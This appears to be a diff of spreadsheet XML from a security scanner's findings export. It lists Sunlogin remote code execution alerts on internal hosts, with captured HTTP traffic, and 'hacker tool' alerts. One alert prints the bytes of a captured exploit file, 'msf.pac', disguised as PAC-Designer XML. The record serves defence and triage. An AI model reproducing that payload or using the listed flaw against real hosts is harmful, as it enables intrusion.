+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X16" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y16" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="17">
+      <c r="A17" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B17" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C17" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D17" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E17" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F17" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G17" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H17" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I17" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J17" t="inlineStr"/>
+      <c r="K17" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L17" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M17" t="inlineStr">
+        <is>
+          <t>192.168.54.68</t>
+        </is>
+      </c>
+      <c r="N17" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O17" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P17" t="inlineStr">
+        <is>
+          <t>父组名</t>
+        </is>
+      </c>
+      <c r="Q17" t="inlineStr"/>
+      <c r="R17" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S17" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T17" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U17" t="inlineStr"/>
+      <c r="V17" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W17" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X17" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y17" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="18">
+      <c r="A18" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B18" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C18" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D18" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E18" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F18" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G18" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H18" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I18" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J18" t="inlineStr"/>
+      <c r="K18" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L18" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M18" t="inlineStr">
+        <is>
+          <t>192.168.54.213</t>
+        </is>
+      </c>
+      <c r="N18" t="inlineStr">
+        <is>
+          <t>其他</t>
+        </is>
+      </c>
+      <c r="O18" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P18" t="inlineStr">
+        <is>
+          <t>test1111</t>
+        </is>
+      </c>
+      <c r="Q18" t="inlineStr"/>
+      <c r="R18" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S18" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T18" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U18" t="inlineStr"/>
+      <c r="V18" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W18" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X18" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y18" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="19">
+      <c r="A19" t="inlineStr">
+        <is>
+          <t>向日葵远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672)</t>
+        </is>
+      </c>
+      <c r="B19" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C19" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D19" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E19" t="inlineStr">
+        <is>
+          <t>当前官方已发布最新版本已经修复此漏洞，建议受影响的用户及时更新升级到最新版本。下载链接：
+https://sunlogin.oray.com/download/</t>
+        </is>
+      </c>
+      <c r="F19" t="inlineStr">
+        <is>
+          <t>向日葵存在远程代码执行漏洞。该漏洞是由于攻击者向日葵特定接口传入恶意请求，在未授权的情况下获取到有效session ，再利用该session在特定接口下构造恶意请求，实现在目标服务器上执行任意命令。攻击者可以利用此漏洞获取服务器权限。</t>
+        </is>
+      </c>
+      <c r="G19" t="inlineStr">
+        <is>
+          <t>活跃漏洞、热点漏洞、有攻击代码披露、高可利用</t>
+        </is>
+      </c>
+      <c r="H19" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I19" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J19" t="inlineStr"/>
+      <c r="K19" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="L19" t="inlineStr">
+        <is>
+          <t>2026-07-13 21:24</t>
+        </is>
+      </c>
+      <c r="M19" t="inlineStr">
+        <is>
+          <t>192.168.51.66</t>
+        </is>
+      </c>
+      <c r="N19" t="inlineStr">
+        <is>
+          <t>服务器</t>
+        </is>
+      </c>
+      <c r="O19" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P19" t="inlineStr">
+        <is>
+          <t>子组名</t>
+        </is>
+      </c>
+      <c r="Q19" t="inlineStr"/>
+      <c r="R19" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S19" t="inlineStr">
+        <is>
+          <t>退库资产</t>
+        </is>
+      </c>
+      <c r="T19" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U19" t="inlineStr"/>
+      <c r="V19" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W19" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X19" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y19" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="20">
+      <c r="A20" t="inlineStr">
+        <is>
+          <t>利用工具</t>
+        </is>
+      </c>
+      <c r="B20" t="inlineStr">
+        <is>
+          <t>建议修复</t>
+        </is>
+      </c>
+      <c r="C20" t="inlineStr">
+        <is>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr">
+        <is>
+          <t>黑客工具攻击</t>
+        </is>
+      </c>
+      <c r="E20" t="inlineStr"/>
+      <c r="F20" t="inlineStr">
+        <is>
+          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
+        </is>
+      </c>
+      <c r="G20" t="inlineStr">
+        <is>
+          <t>活跃漏洞</t>
+        </is>
+      </c>
+      <c r="H20" t="inlineStr">
+        <is>
+          <t>SIP</t>
+        </is>
+      </c>
+      <c r="I20" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J20" t="inlineStr"/>
+      <c r="K20" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="L20" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="M20" t="inlineStr">
+        <is>
+          <t>192.200.41.126</t>
+        </is>
+      </c>
+      <c r="N20" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O20" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P20" t="inlineStr"/>
+      <c r="Q20" t="inlineStr"/>
+      <c r="R20" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S20" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T20" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="U20" t="inlineStr">
+        <is>
+          <t>192.200.41.126/repro/msf.pac</t>
+        </is>
+      </c>
+      <c r="V20" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W20" t="inlineStr">
+        <is>
+          <t>页面url: 192.200.41.126/repro/msf.pac
+请求体: GET /repro/msf.pac HTTP/1.1
+Host: 192.200.41.126
+Connection: keep-alive
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Referer: http://192.200.41.126/repro/
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: zh-CN,zh;q=0.8
+Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
+响应体: HTTP/1.1 200 OK
+Date: Thu, 05 Jul 2012 08:27:57 GMT
+Server: Apache/2.2.15 (Win32) PHP/5.2.13
+Last-Modified: Thu, 05 Jul 2012 07:39:53 GMT
+ETag: "4000000004d60-314-4c41040db73c8"
+Accept-Ranges: bytes
+Content-Length: 788
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/plain
+&lt;?xml version="1.0"?&gt;
+&lt;PacDesignData&gt;
+  &lt;DocFmtVersion&gt;1&lt;/DocFmtVersion&gt;
+  &lt;DeviceType&gt;ispPAC-CLK5410D&lt;/DeviceType&gt;
+  &lt;CreatedBy&gt;PAC-Designer 6.21.1336&lt;/CreatedBy&gt;
+  &lt;SummaryInformation&gt;
+    &lt;Title&gt;�ľ�H\�t$�[1ɱ31s�sP�_�!��W_��(�B��A�!'�r�#�V�%G��vgYǿ�h�
+�+�SwqV�v�e0Yc!�X�1�͂��V�g�hjȭ�(��M�|�`�Q`��ݡ+�*�hh�1*�GA�e�*�i�uJi�u��U�ЪDtp#�.�W1�)�v�b�x?��Q�&lt;/Title&gt;
+    &lt;Author&gt;eWockK&lt;/Author&gt;
+  &lt;/SummaryInformation&gt;
+  &lt;SymbolicSchematicData&gt;
+    &lt;Symbol&gt;
+      &lt;SymKey&gt;153&lt;/SymKey&gt;
+      &lt;NameText&gt;Profile 0 Ref Frequency&lt;/NameText&gt;
+      &lt;Value&gt;__\aaaaaaQ�QunfgpIcguMsPZpAZDzGHTxSQpnvmfxkWBqTuWmXfPTbECGIXeZftoUOFsHvncyJRZCRyvkxvaFtiwknBFWPZ�Lq P�&lt;/Value&gt;
+    &lt;/Symbol&gt;
+  &lt;/SymbolicSchematicData&gt;
+&lt;/PacDesignData&gt;</t>
+        </is>
+      </c>
+      <c r="X20" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y20" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="21">
+      <c r="A21" t="inlineStr">
+        <is>
+          <t>利用工具</t>
+        </is>
+      </c>
+      <c r="B21" t="inlineStr">
+        <is>
+          <t>建议修复</t>
+        </is>
+      </c>
+      <c r="C21" t="inlineStr">
+        <is>
+          <t>低危</t>
+        </is>
+      </c>
+      <c r="D21" t="inlineStr">
+        <is>
+          <t>黑客工具攻击</t>
+        </is>
+      </c>
+      <c r="E21" t="inlineStr"/>
+      <c r="F21" t="inlineStr">
+        <is>
+          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
+        </is>
+      </c>
+      <c r="G21" t="inlineStr">
+        <is>
+          <t>活跃漏洞</t>
+        </is>
+      </c>
+      <c r="H21" t="inlineStr">
+        <is>
+          <t>SIP、STA</t>
+        </is>
+      </c>
+      <c r="I21" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J21" t="inlineStr"/>
+      <c r="K21" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="L21" t="inlineStr">
+        <is>
+          <t>2026-07-13 20:02</t>
+        </is>
+      </c>
+      <c r="M21" t="inlineStr">
+        <is>
+          <t>192.200.42.215</t>
+        </is>
+      </c>
+      <c r="N21" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O21" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P21" t="inlineStr">
+        <is>
+          <t>子组名</t>
+        </is>
+      </c>
+      <c r="Q21" t="inlineStr"/>
+      <c r="R21" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S21" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T21" t="inlineStr">
+        <is>
+          <t>80</t>
+        </is>
+      </c>
+      <c r="U21" t="inlineStr">
+        <is>
+          <t>192.200.42.215/winamp.ini</t>
+        </is>
+      </c>
+      <c r="V21" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W21" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: 192.200.42.215/winamp.ini
+请求体: GET /winamp.ini HTTP/1.1
+Host: 192.200.42.215
+Connection: keep-alive
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: zh-CN,zh;q=0.8
+响应体: HTTP/1.1 200 OK
+Date: Tue, 03 Sep 2013 12:04:10 GMT
+Server: Apache/2.4.4 (Win32) OpenSSL/1.0.1e PHP/5.3.23
+Last-Modified: Tue, 03 Sep 2013 07:39:02 GMT
+ETag: "65a-4e575c8656974"
+Accept-Ranges: bytes
+Content-Length: 1626
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
